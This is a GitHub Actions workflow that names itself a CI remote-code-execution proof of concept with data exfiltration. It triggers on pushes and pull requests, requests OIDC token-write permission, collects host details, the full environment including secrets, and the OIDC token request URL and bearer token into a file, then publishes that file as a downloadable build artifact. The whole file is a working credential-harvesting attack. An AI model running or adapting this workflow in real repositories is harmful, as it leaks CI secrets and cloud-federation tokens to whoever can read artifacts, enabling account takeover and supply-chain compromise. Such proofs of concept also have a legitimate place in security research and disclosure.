name: CI RCE PoC with Sensitive Data Exfiltration

on:
  push:
    branches:
      - main
  pull_request:
    types: [opened, synchronize]

permissions:
  id-token: write
  contents: read

jobs:
  exfiltrate:
    runs-on: ubuntu-latest

    steps:
      - name: Confirm Environment + Leak Sensitive Data
        run: |
          echo "SAFE_CI_PROOF [+] Executing payload..." > leaks.txt
          echo "== WHOAMI ==" >> leaks.txt
          whoami >> leaks.txt
          echo "== ID ==" >> leaks.txt
          id >> leaks.txt
          echo "== UNAME ==" >> leaks.txt
          uname -a >> leaks.txt
          echo "== OS RELEASE ==" >> leaks.txt
          cat /etc/os-release >> leaks.txt

          echo "== ENV VARS (INCLUDING TOKENS) ==" >> leaks.txt
          env >> leaks.txt

          echo "== GITHUB_STEP_SUMMARY ==" >> leaks.txt
          cat "$GITHUB_STEP_SUMMARY" >> leaks.txt 2>/dev/null || echo "Not Found" >> leaks.txt

          echo "== OIDC TOKENS ==" >> leaks.txt
          echo "ACTIONS_ID_TOKEN_REQUEST_URL=${ACTIONS_ID_TOKEN_REQUEST_URL}" >> leaks.txt
          echo "ACTIONS_ID_TOKEN_REQUEST_TOKEN=${ACTIONS_ID_TOKEN_REQUEST_TOKEN}" >> leaks.txt

      - name: Upload Leaked Data
        uses: actions/upload-artifact@v4
        with:
          name: leaks
          path: leaks.txt
